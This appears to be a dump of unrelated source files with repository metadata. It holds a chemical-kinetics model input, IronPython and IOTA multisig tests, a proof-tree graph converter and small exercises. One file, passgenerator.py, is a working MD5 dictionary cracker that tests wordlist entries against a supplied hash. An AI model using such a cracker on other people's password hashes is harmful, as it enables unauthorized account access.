thermo = NASA(polynomials=[NASAPolynomial(coeffs=[4.02957,-0.00263999,1.52235e-05,-1.71679e-08,6.26771e-12,322.677,4.84424], Tmin=(100,'K'), Tmax=(923.901,'K')), NASAPolynomial(coeffs=[4.1513,0.00191152,-4.11308e-07,6.35038e-11,-4.86452e-15,83.4341,3.09359], Tmin=(923.901,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(2.67648,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(58.2013,'J/(mol*K)'), label="""HO2""", comment="""Thermo library: BurkeH2O2"""),
)
species(
label = 'O(4)',
structure = SMILES('[O]'),
E0 = (243.005,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (15.9994,'amu'),
collisionModel = TransportData(shapeIndex=0, epsilon=(665.16,'J/mol'), sigma=(2.75,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=0.0, comment="""GRI-Mech"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[2.5,-2.38914e-13,3.12709e-16,-1.33367e-19,1.7499e-23,29226.7,5.11107], Tmin=(100,'K'), Tmax=(4383.16,'K')), NASAPolynomial(coeffs=[2.50003,-3.04997e-08,1.01101e-11,-1.48797e-15,8.20356e-20,29226.7,5.11085], Tmin=(4383.16,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(243.005,'kJ/mol'), Cp0=(20.7862,'J/(mol*K)'), CpInf=(20.7862,'J/(mol*K)'), label="""O""", comment="""Thermo library: BurkeH2O2"""),
)
species(
label = 'CCCC([O])CCC(151)',
structure = SMILES('CCCC([O])CCC'),
E0 = (-157.754,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([2750,2764.29,2778.57,2792.86,2807.14,2821.43,2835.71,2850,1425,1433.33,1441.67,1450,1225,1241.67,1258.33,1275,1270,1293.33,1316.67,1340,700,733.333,766.667,800,300,333.333,366.667,400,1380,1390,370,380,2900,435,2750,2770,2790,2810,2830,2850,1350,1400,1450,1500,700,800,1000,1100,1350,1400,900,1100,200,800,1066.67,1333.33,1600],'cm^-1')),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 2,
opticalIsomers = 1,
molecularWeight = (115.193,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[-0.447159,0.089151,-5.8819e-05,1.98848e-08,-2.76336e-12,-18806.6,33.7866], Tmin=(100,'K'), Tmax=(1640.09,'K')), NASAPolynomial(coeffs=[18.0491,0.0440406,-1.75618e-05,3.11448e-09,-2.07048e-13,-24873.7,-64.5982], Tmin=(1640.09,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(-157.754,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(532.126,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsH) + group(Cs-CsCsOsH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsHHH) + group(Cs-CsHHH) + radical(CC(C)OJ)"""),
)
species(
label = 'N2',
structure = SMILES('N#N'),
E0 = (-8.69489,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (28.0135,'amu'),
collisionModel = TransportData(shapeIndex=1, epsilon=(810.913,'J/mol'), sigma=(3.621,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(1.76,'angstroms^3'), rotrelaxcollnum=4.0, comment="""PrimaryTransportLibrary"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[3.61263,-0.00100893,2.49898e-06,-1.43375e-09,2.58635e-13,-1051.1,2.6527], Tmin=(100,'K'), Tmax=(1817.04,'K')), NASAPolynomial(coeffs=[2.97591,0.0016414,-7.19719e-07,1.25377e-10,-7.91522e-15,-1025.85,5.53754], Tmin=(1817.04,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(-8.69489,'kJ/mol'), Cp0=(29.1007,'J/(mol*K)'), CpInf=(37.4151,'J/(mol*K)'), label="""N2""", comment="""Thermo library: BurkeH2O2"""),
)
species(
label = 'Ne',
structure = SMILES('[Ne]'),
E0 = (-6.19738,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (20.1797,'amu'),
collisionModel = TransportData(shapeIndex=0, epsilon=(1235.53,'J/mol'), sigma=(3.758e-10,'m'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=0, comment="""Epsilon & sigma estimated with fixed Lennard Jones Parameters. This is the fallback method! Try improving transport databases!"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[2.5,0,0,0,0,-745.375,3.35532], Tmin=(200,'K'), Tmax=(1000,'K')), NASAPolynomial(coeffs=[2.5,0,0,0,0,-745.375,3.35532], Tmin=(1000,'K'), Tmax=(6000,'K'))], Tmin=(200,'K'), Tmax=(6000,'K'), E0=(-6.19738,'kJ/mol'), Cp0=(20.7862,'J/(mol*K)'), CpInf=(20.7862,'J/(mol*K)'), label="""Ne""", comment="""Thermo library: primaryThermoLibrary"""),
)
transitionState(
label = 'TS1',
E0 = (-29.8083,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS2',
E0 = (195.023,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS3',
E0 = (234.086,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS4',
E0 = (204.792,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS5',
E0 = (247.602,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS6',
E0 = (200.694,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS7',
E0 = (241.633,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS8',
E0 = (252.433,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS9',
E0 = (278.096,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS10',
E0 = (-3.6475,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS11',
E0 = (-32.0968,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS12',
E0 = (-87.2015,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS13',
E0 = (-54.8589,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS14',
E0 = (-40.7595,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS15',
E0 = (85.2504,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
reaction(
label = 'reaction1',
reactants = ['O2(2)', 'CCC[CH]CCC(73)'],
products = ['CCCC(CCC)O[O](138)'],
transitionState = 'TS1',
kinetics = Arrhenius(A=(7.54e+12,'cm^3/(mol*s)','+|-',1e+12), n=0, Ea=(0,'kJ/mol'), T0=(1,'K'), Tmin=(300,'K'), Tmax=(1500,'K'), comment="""From training reaction 112 used for O2_birad;C_rad/H/NonDeC
Exact match found for rate rule [C_rad/H/NonDeC;O2_birad]
Euclidian distance = 0
Multiplied by reaction path degeneracy 2.0
family: R_Recombination"""),
)
reaction(
label = 'reaction6',
reactants = ['CCC[CH]O[O](143)', 'npropyl(70)'],
products = ['CCCC(CCC)O[O](138)'],
transitionState = 'TS2',
kinetics = Arrhenius(A=(1.15e+14,'cm^3/(mol*s)','*|/',2), n=-0.35, Ea=(0,'kJ/mol'), T0=(1,'K'), Tmin=(300,'K'), Tmax=(2500,'K'), comment="""Estimated using template [C_rad/H/NonDe;C_rad/H2/Cs] for rate rule [C_rad/H/CsO;C_rad/H2/Cs]
Euclidian distance = 2.0
family: R_Recombination"""),
)
reaction(
label = 'reaction7',
reactants = ['H(3)', 'CCC[C](CCC)O[O](144)'],
products = ['CCCC(CCC)O[O](138)'],
transitionState = 'TS3',
kinetics = Arrhenius(A=(6.68468e+06,'m^3/(mol*s)'), n=-0.0135, Ea=(0,'kJ/mol'), T0=(1,'K'), comment="""Estimated using template [C_rad/NonDe;Y_rad] for rate rule [C_rad/NonDeCO;H_rad]
Euclidian distance = 2.2360679775
family: R_Recombination
Ea raised from -0.9 to 0 kJ/mol."""),
)
reaction(
label = 'reaction8',
reactants = ['C2H5(32)', '[CH2]C(CCC)O[O](145)'],
products = ['CCCC(CCC)O[O](138)'],
transitionState = 'TS4',
kinetics = Arrhenius(A=(8.73e+14,'cm^3/(mol*s)'), n=-0.699, Ea=(0,'kJ/mol'), T0=(1,'K'), Tmin=(200,'K'), Tmax=(2000,'K'), comment="""From training reaction 11 used for C_rad/H2/Cs;C_rad/H2/Cs
Exact match found for rate rule [C_rad/H2/Cs;C_rad/H2/Cs]
Euclidian distance = 0
family: R_Recombination
Ea raised from -0.0 to 0 kJ/mol."""),
)
reaction(
label = 'reaction9',
reactants = ['H(3)', 'CC[CH]C(CCC)O[O](146)'],
products = ['CCCC(CCC)O[O](138)'],
transitionState = 'TS5',
kinetics = Arrhenius(A=(2e+13,'cm^3/(mol*s)','*|/',3.16), n=0, Ea=(0,'kJ/mol'), T0=(1,'K'), Tmin=(300,'K'), Tmax=(2000,'K'), comment="""From training reaction 59 used for H_rad;C_rad/H/NonDeC
Exact match found for rate rule [C_rad/H/NonDeC;H_rad]
Euclidian distance = 0
family: R_Recombination"""),
)
reaction(
label = 'reaction10',
reactants = ['[CH2]CC(CCC)O[O](147)', 'CH3(18)'],
products = ['CCCC(CCC)O[O](138)'],
transitionState = 'TS6',
kinetics = Arrhenius(A=(1.23e+15,'cm^3/(mol*s)'), n=-0.562, Ea=(0.085772,'kJ/mol'), T0=(1,'K'), Tmin=(200,'K'), Tmax=(2000,'K'), comment="""From training reaction 10 used for C_methyl;C_rad/H2/Cs
Exact match found for rate rule [C_rad/H2/Cs;C_methyl]
Euclidian distance = 0
family: R_Recombination"""),
)
reaction(
label = 'reaction11',
reactants = ['H(3)', 'C[CH]CC(CCC)O[O](148)'],
products = ['CCCC(CCC)O[O](138)'],
transitionState = 'TS7',
kinetics = Arrhenius(A=(2e+13,'cm^3/(mol*s)','*|/',3.16), n=0, Ea=(0,'kJ/mol'), T0=(1,'K'), Tmin=(300,'K'), Tmax=(2000,'K'), comment="""From training reaction 59 used for H_rad;C_rad/H/NonDeC
Exact match found for rate rule [C_rad/H/NonDeC;H_rad]
Euclidian distance = 0
family: R_Recombination"""),
)
reaction(
label = 'reaction12',
reactants = ['H(3)', '[CH2]CCC(CCC)O[O](149)'],
products = ['CCCC(CCC)O[O](138)'],
transitionState = 'TS8',
kinetics = Arrhenius(A=(3.48677e-12,'cm^3/(molecule*s)'), n=0.6, Ea=(0,'kJ/mol'), T0=(1,'K'), comment="""From training reaction 18 used for C_rad/H2/Cs;H_rad
Exact match found for rate rule [C_rad/H2/Cs;H_rad]
Euclidian distance = 0
family: R_Recombination
Ea raised from -3.3 to 0 kJ/mol."""),
)
reaction(
label = 'reaction9',
reactants = ['CH2(S)(24)', 'CCCC(CC)O[O](150)'],
products = ['CCCC(CCC)O[O](138)'],
transitionState = 'TS9',
kinetics = Arrhenius(A=(1.31021e+06,'m^3/(mol*s)'), n=0.189, Ea=(0,'kJ/mol'), T0=(1,'K'), comment="""Estimated using template [carbene;C_pri] for rate rule [carbene;C_pri/NonDeC]
Euclidian distance = 1.0
Multiplied by reaction path degeneracy 3.0
family: 1,2_Insertion_carbene
Ea raised from -1.5 to 0 kJ/mol."""),
)
reaction(
label = 'reaction2',
reactants = ['CCCC(CCC)O[O](138)'],
products = ['CCC[C](CCC)OO(139)'],
transitionState = 'TS10',
kinetics = Arrhenius(A=(4.97e+09,'s^-1'), n=1.01, Ea=(160.958,'kJ/mol'), T0=(1,'K'), Tmin=(300,'K'), Tmax=(1500,'K'), comment="""From training reaction 245 used for R3H_SS_O;O_rad_out;Cs_H_out_Cs2
Exact match found for rate rule [R3H_SS_O;O_rad_out;Cs_H_out_Cs2]
Euclidian distance = 0
family: intra_H_migration"""),
)
reaction(
label = 'reaction3',
reactants = ['CC[CH]C(CCC)OO(140)'],
products = ['CCCC(CCC)O[O](138)'],
transitionState = 'TS11',
kinetics = Arrhenius(A=(2960,'s^-1'), n=2.11, Ea=(84.0984,'kJ/mol'), T0=(1,'K'), Tmin=(300,'K'), Tmax=(2500,'K'), comment="""From training reaction 323 used for R4H_SSS;C_rad_out_H/NonDeC;O_H_out
Exact match found for rate rule [R4H_SSS;C_rad_out_H/NonDeC;O_H_out]
Euclidian distance = 0
family: intra_H_migration"""),
)
reaction(
label = 'reaction4',
reactants = ['CCCC(CCC)O[O](138)'],
products = ['C[CH]CC(CCC)OO(141)'],
transitionState = 'TS12',
kinetics = Arrhenius(A=(1.352e+11,'s^-1'), n=0.21, Ea=(77.404,'kJ/mol'), T0=(1,'K'), Tmin=(300,'K'), Tmax=(1500,'K'), comment="""From training reaction 261 used for R5H_SSSS_OCC_C;O_rad_out;Cs_H_out_H/NonDeC
Exact match found for rate rule [R5H_SSSS_OCC_C;O_rad_out;Cs_H_out_H/NonDeC]
Euclidian distance = 0
Multiplied by reaction path degeneracy 4.0
family: intra_H_migration"""),
)
reaction(
label = 'reaction5',
reactants = ['[CH2]CCC(CCC)OO(142)'],
products = ['CCCC(CCC)O[O](138)'],
transitionState = 'TS13',
kinetics = Arrhenius(A=(135.127,'s^-1'), n=2.18479, Ea=(56.5049,'kJ/mol'), T0=(1,'K'), comment="""Estimated using template [R6H_SSSSS;C_rad_out_2H;XH_out] for rate rule [R6H_SSSSS;C_rad_out_2H;O_H_out]
Euclidian distance = 1.0
family: intra_H_migration"""),
)
reaction(
label = 'reaction14',
reactants = ['CCCC(CCC)O[O](138)'],
products = ['CCC=CCCC(122)', 'HO2(10)'],
transitionState = 'TS14',
kinetics = Arrhenius(A=(6.6e+09,'s^-1'), n=1.01, Ea=(123.846,'kJ/mol'), T0=(1,'K'), Tmin=(300,'K'), Tmax=(1500,'K'), comment="""From training reaction 6 used for R2OO_HNd_HNd
Exact match found for rate rule [R2OO_HNd_HNd]
Euclidian distance = 0
Multiplied by reaction path degeneracy 4.0
family: HO2_Elimination_from_PeroxyRadical"""),
)
reaction(
label = 'reaction15',
reactants = ['O(4)', 'CCCC([O])CCC(151)'],
products = ['CCCC(CCC)O[O](138)'],
transitionState = 'TS15',
kinetics = Arrhenius(A=(54738.4,'m^3/(mol*s)'), n=0.884925, Ea=(0,'kJ/mol'), T0=(1,'K'), Tmin=(303.03,'K'), Tmax=(2000,'K'), comment="""From training reaction 3 used for O_rad/NonDe;O_birad
Exact match found for rate rule [O_rad/NonDe;O_birad]
Euclidian distance = 0
family: Birad_R_Recombination
Ea raised from -2.9 to 0 kJ/mol."""),
)
network(
label = '42',
isomers = [
'CCCC(CCC)O[O](138)',
],
reactants = [
('O2(2)', 'CCC[CH]CCC(73)'),
],
bathGas = {
'N2': 0.5,
'Ne': 0.5,
},
)
pressureDependence(
label = '42',
Tmin = (300,'K'),
Tmax = (2000,'K'),
Tcount = 8,
Tlist = ([302.47,323.145,369.86,455.987,609.649,885.262,1353.64,1896.74],'K'),
Pmin = (0.01,'bar'),
Pmax = (100,'bar'),
Pcount = 5,
Plist = ([0.0125282,0.0667467,1,14.982,79.8202],'bar'),
maximumGrainSize = (0.5,'kcal/mol'),
minimumGrainCount = 250,
method = 'modified strong collision',
interpolationModel = ('Chebyshev', 6, 4),
activeKRotor = True,
activeJRotor = True,
rmgmode = True,
)
| [
"qin.she@husky.neu.edu"
] | qin.she@husky.neu.edu |
e57fdecaa8e8af1f6a70af6ad39d54ded1593e07 | dec3093213b5586a187035848eb51aafbe62fb5c | /passgenerator.py | f1492a50bbf10aa88e2b6e8319a89760e795aa63 | [] | no_license | NikhiSharma/PasswordGeneratorThroughMD5Hash | 3beac4b39a82f5d32e774a523e0b08c8515bb4cf | d12fa9d4203899d5d85db4b7a5e8f63eddb2d235 | refs/heads/main | 2023-01-22T10:35:19.909647 | 2020-12-07T19:06:01 | 2020-12-07T19:06:01 | 319,416,848 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 794 | py | '''import string,random
def generatePassword(num):
password=''
for n in range(num):
x=random.randint(0,94)
password+=string.printable[x]
return password
print(generatePassword(16))
'''
import hashlib
flag = 0
pass_hash = input("Enter md5 hash: ")
wordlist = input("File name: ")
try:
pass_file = open(wordlist, "r")
except:
print("No file found")
quit()
for word in pass_file:
enc_word = word.encode('utf-8')
digest = hashlib.md5(enc_word.strip()).hexdigest()
print(word)
print(digest)
print(pass_hash)
if digest == pass_hash:
print("password found")
print("password is "+word)
flag = 1
break
if flag==0:
print("password not in list")
| [
"noreply@github.com"
] | noreply@github.com |
e9eea4df8f1b7b7476963e1743ec066271cf9a73 | 9ef6107b62765082fdffa708fc2a8fc9aa6cbe1c | /Tests/interop/net/loadorder/t3h.py | 5e290012eae57a5c3727a59a3ec55d5c16b05805 | [
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | dsonbill/IronPython3-NETCore | c1f94547c14d0b2f9955ed83a025efaae76cb0e3 | 8c76bdbec1754233f04b41ecd28e9bae2c862fd0 | refs/heads/master | 2022-12-23T11:26:17.219724 | 2017-10-23T11:06:10 | 2017-10-23T11:06:10 | 107,932,545 | 2 | 1 | Apache-2.0 | 2022-12-12T07:09:07 | 2017-10-23T04:36:00 | Python | UTF-8 | Python | false | false | 1,606 | py | #####################################################################################
#
# Copyright (c) Microsoft Corporation. All rights reserved.
#
# This source code is subject to terms and conditions of the Apache License, Version 2.0. A
# copy of the license can be found in the License.html file at the root of this distribution. If
# you cannot locate the Apache License, Version 2.0, please send an email to
# ironpy@microsoft.com. By using this source code in any fashion, you are agreeing to be bound
# by the terms of the Apache License, Version 2.0.
#
# You must not remove this notice, or any other, from this software.
#
#
#####################################################################################
from iptest.assert_util import *
add_clr_assemblies("loadorder_3")
# namespace First {
# public class Generic1<K, V> {
# public static string Flag = typeof(Generic1<,>).FullName;
# }
# }
import First
from First import *
AreEqual(First.Generic1[str, str].Flag, "First.Generic1`2")
add_clr_assemblies("loadorder_3h")
# namespace First {
# public class Generic1<T> {
# public static string Flag = typeof(Generic1<>).FullName;
# }
# }
AreEqual(First.Generic1[str, str].Flag, "First.Generic1`2")
AreEqual(First.Generic1[int].Flag, "First.Generic1`1")
AssertError(ValueError, lambda: Generic1[int]) # !!!
AreEqual(Generic1[str, str].Flag, "First.Generic1`2")
from First import *
AreEqual(Generic1[str, str].Flag, "First.Generic1`2")
AreEqual(Generic1[int].Flag, "First.Generic1`1")
| [
"jdhardy@gmail.com"
] | jdhardy@gmail.com |
08a13407b68ca6cda24394e7cdfc4eb4314bec1e | bc64931a5cdfed6d54a8d8828e9b9d4510d7a998 | /test/multisig/commands/create_multisig_address_test.py | 83ae9dbd6d76cdcf5210d0bea2085f4dc26f7cac | [
"MIT"
] | permissive | valentinlehuger/iota.lib.py | 4b9ddfda9c283b4fde6d9ba6ab5d6c1add5cd920 | e345de981829a36ceaccf3862835c0dd28486950 | refs/heads/master | 2021-01-19T12:26:09.709236 | 2017-07-16T01:19:39 | 2017-07-16T01:19:39 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,866 | py | # coding=utf-8
from __future__ import absolute_import, division, print_function, \
unicode_literals
from unittest import TestCase
import filters as f
from filters.test import BaseFilterTestCase
from iota import TryteString
from iota.adapter import MockAdapter
from iota.crypto.types import Digest
from iota.filters import Trytes
from iota.multisig import MultisigIota
from iota.multisig.commands import CreateMultisigAddressCommand
from iota.multisig.types import MultisigAddress
from six import binary_type, text_type
class CreateMultisigAddressCommandTestCase(TestCase):
# noinspection SpellCheckingInspection
def setUp(self):
super(CreateMultisigAddressCommandTestCase, self).setUp()
self.adapter = MockAdapter()
self.command = CreateMultisigAddressCommand(self.adapter)
# Define some tryte sequences that we can reuse between tests.
self.digest_1 =\
Digest(
trytes =
b'FWNEPVJNGUKTSHSBDO9AORBCVWWLVXC9KAMKYYNKPYNJDKSAUURI9ELKOEEYPKVTYP'
b'CKOCJQESYFEMINIFKX9PDDGRBEEHYYXCJW9LHGWFZGHKCPVDBGMGQKIPCNKNITGMZT'
b'DIWVUB9PCHCOPHMIWKSUKRHZOJPMAY',
key_index = 0,
)
self.digest_2 =\
Digest(
trytes =
b'PAIRLDJQY9XAUSKIGCTHRJHZVARBEY9NNHYJ9UI9HWWZXFSDWEZEGDCWNVVYSYDV9O'
b'HTR9NGGZURISWTNECFTCMEWQQFJ9VKLFPDTYJYXC99OLGRH9OSFJLMEOGHFDHZYEAF'
b'IMIZTJRBQUVCR9U9ZWTMUXTUEOUBLC',
key_index = 0,
)
def test_wireup(self):
"""
Verify that the command is wired up correctly.
"""
self.assertIsInstance(
MultisigIota(self.adapter).createMultisigAddress,
CreateMultisigAddressCommand,
)
def test_happy_path(self):
"""
Generating a multisig address.
"""
result = self.command(digests=[self.digest_1, self.digest_2])
# noinspection SpellCheckingInspection
self.assertDictEqual(
result,
{
'address':
MultisigAddress(
trytes =
b'JUIFYSUQFVBFGNHOJMLWBHMGASFGBPAUMRZRRCJF'
b'CCOJHJKZVUOCEYSCLXAGDABCEWSUXCILJCGQWI9SF',
digests = [self.digest_1, self.digest_2],
),
},
)
class CreateMultisigAddressRequestFilterTestCase(BaseFilterTestCase):
filter_type = CreateMultisigAddressCommand(MockAdapter()).get_request_filter
skip_value_check = True
# noinspection SpellCheckingInspection
def setUp(self):
super(CreateMultisigAddressRequestFilterTestCase, self).setUp()
# Define some tryte sequences that we can reuse between tests.
self.digest_1 =\
Digest(
trytes =
b'FWNEPVJNGUKTSHSBDO9AORBCVWWLVXC9KAMKYYNKPYNJDKSAUURI9ELKOEEYPKVTYP'
b'CKOCJQESYFEMINIFKX9PDDGRBEEHYYXCJW9LHGWFZGHKCPVDBGMGQKIPCNKNITGMZT'
b'DIWVUB9PCHCOPHMIWKSUKRHZOJPMAY',
key_index = 0,
)
self.digest_2 =\
Digest(
trytes =
b'PAIRLDJQY9XAUSKIGCTHRJHZVARBEY9NNHYJ9UI9HWWZXFSDWEZEGDCWNVVYSYDV9O'
b'HTR9NGGZURISWTNECFTCMEWQQFJ9VKLFPDTYJYXC99OLGRH9OSFJLMEOGHFDHZYEAF'
b'IMIZTJRBQUVCR9U9ZWTMUXTUEOUBLC',
key_index = 0,
)
def test_pass_happy_path(self):
"""
Request is valid.
"""
request = {
'digests': [self.digest_1, self.digest_2],
}
filter_ = self._filter(request)
self.assertFilterPasses(filter_)
self.assertDictEqual(filter_.cleaned_data, request)
def test_pass_compatible_types(self):
"""
Request contains values that can be converted to the expected
types.
"""
filter_ = self._filter({
# ``digests`` may contain any values that can be converted into
# :py:class:`Digest` objects.
'digests': [binary_type(self.digest_1), TryteString(self.digest_2)],
})
self.assertFilterPasses(filter_)
self.assertDictEqual(
filter_.cleaned_data,
{
'digests': [self.digest_1, self.digest_2],
},
)
def test_fail_empty(self):
"""
Request is empty.
"""
self.assertFilterErrors(
{},
{
'digests': [f.FilterMapper.CODE_MISSING_KEY],
},
)
def test_fail_unexpected_parameters(self):
"""
Request contains unexpected parameters.
"""
self.assertFilterErrors(
{
'digests': [self.digest_1, self.digest_2],
# Oh, and I suppose that's completely inconspicuous.
'foo': 'bar',
},
{
'foo': [f.FilterMapper.CODE_EXTRA_KEY],
},
)
def test_fail_digests_null(self):
"""
``digests`` is null.
"""
self.assertFilterErrors(
{
'digests': None,
},
{
'digests': [f.Required.CODE_EMPTY],
},
)
def test_fail_digests_wrong_type(self):
"""
``digests`` is not an array.
"""
self.assertFilterErrors(
{
'digests': self.digest_1,
},
{
'digests': [f.Array.CODE_WRONG_TYPE],
},
)
def test_fail_digests_empty(self):
"""
``digests`` is an array, but it's empty.
"""
self.assertFilterErrors(
{
'digests': [],
},
{
'digests': [f.Required.CODE_EMPTY],
},
)
def test_fail_digests_contents_invalid(self):
"""
``digests`` is an array, but it contains invalid values.
"""
self.assertFilterErrors(
{
'digests': [
b'',
True,
None,
b'not valid trytes',
# This is actually valid; I just added it to make sure the
# filter isn't cheating!
TryteString(self.digest_1),
2130706433,
],
},
{
'digests.0': [f.Required.CODE_EMPTY],
'digests.1': [f.Type.CODE_WRONG_TYPE],
'digests.2': [f.Required.CODE_EMPTY],
'digests.3': [Trytes.CODE_NOT_TRYTES],
'digests.5': [f.Type.CODE_WRONG_TYPE],
},
)
| [
"phx@phx.ph"
] | phx@phx.ph |
a0815932e8ddab8b8f48ee48ac30b57112bca357 | a7f09e36253a6cde37eeddf142bec504f7e7e6f1 | /ATM/graphics/tree_converter.py | be9d0a0e6b1d775d7368a1877c2af06d67c62405 | [] | no_license | jermcmahan/ATM | 326c0a6da2f43e6671738d887bbc2e54ca1b3753 | bdc3454e3755c150c4095904f1a9d876b4d282ed | refs/heads/master | 2021-10-22T07:02:38.936085 | 2019-03-08T23:18:55 | 2019-03-08T23:18:55 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,297 | py | from networkx.classes.graph import Graph
"""
TreeConverter --- class to perform the conversion from an ATM proof-tree to the graphical representation of the tree
:author Jeremy McMahan
"""
class TreeConverter:
"""
Constructs the graphical representation of the proof-tree from the computation tree
:param T the ComputationTree
:returns the graphical representation of the proof-tree
"""
@staticmethod
def to_graphics(T):
G = Graph()
TreeConverter.to_nx_graph(T.proof_tree(), G, 1)
return G
"""
Adds a subtree of a proof-tree into the networkx graph and uses the number given as the root's name
:param T a subtree of a proof-tree
:param G a networkx graph
:param name the name to be given to the root of T
:returns the next free name that can be used for a vertex
"""
@staticmethod
def to_nx_graph(T, G, name):
G.add_node(name, label=T.root[0]) # enable many nodes to have same name when displayed
next_name = name+1
for child in T.children:
current_name = next_name
next_name = TreeConverter.to_nx_graph(child, G, current_name)
G.add_edge(name, current_name, label=T.root[1]) # display the character read on the edge
return next_name
| [
"noreply@github.com"
] | noreply@github.com |
0c43fc267f1d0b224ff7fc63b37eaf73652c3cda | e8202ff4594f8d4f9834d6be165b39a8fc3d437d | /week8/codingbat/7_string2/3.py | 4f2b097ffc034151fec43c30df85d827dfb38eb6 | [] | no_license | as1k/webdev-labs | 93e939999f38520fc701e245341fee13dfdd8cb2 | 393bf4ffdae8d60640a54efabce62db4ba76eeb8 | refs/heads/master | 2022-04-14T15:38:15.033878 | 2020-04-16T22:12:17 | 2020-04-16T22:12:17 | 237,159,602 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 62 | py | def cat_dog(str):
return str.count("cat")==str.count("dog")
| [
"nurmukhambet.ak@gmail.com"
] | nurmukhambet.ak@gmail.com |
3c4a77994e80ffff18910f6c7b8dabd80beaa432 | 5001bcd36f75203956c424eaff0ac135db7e9b5a | /lesson-2/example01.py | 431cd11fcabeb4cec48ab25a1978fccdc8a73710 | [] | no_license | Andrey-Sherenkov/python_training | cf6d637df1b191761820a62b7c0b8a991f7be815 | f776d0c623e2ecb85bacb27baf3f7fa4c61bd658 | refs/heads/main | 2023-09-03T20:27:07.601982 | 2021-11-05T15:20:57 | 2021-11-05T15:20:57 | 415,219,654 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 595 | py | # 1. Создать список и заполнить его элементами различных типов данных.
# Реализовать скрипт проверки типа данных каждого элемента. Использовать функцию type() для проверки типа.
# Элементы списка можно не запрашивать у пользователя, а указать явно, в программе.
list_of_values = [1, 2, 2.1, 'text', None]
print(list_of_values)
for value in list_of_values:
print(value, type(value))
| [
"andrejjag23@mail.ru"
] | andrejjag23@mail.ru |
76ae977ac197588171decab53690a43a1b0da206 | 6f52fdaabac2275bd2f9598b891ad82214f1f7c7 | /venv/bin/easy_install | b30eb10755a0b5b290d80251088b23c7b6bae279 | [] | no_license | Mone-Lee/python-webapp | 75f2340f1b59bd0203fd68b6f3a95bbaba69760d | db0aa3da26bb432aa8770917d9a7233381248e00 | refs/heads/master | 2023-05-31T14:29:18.879083 | 2021-06-08T06:56:35 | 2021-06-08T06:56:35 | 353,957,737 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 280 | #!/Users/lee/Documents/project/python/python-webapp/venv/bin/python3
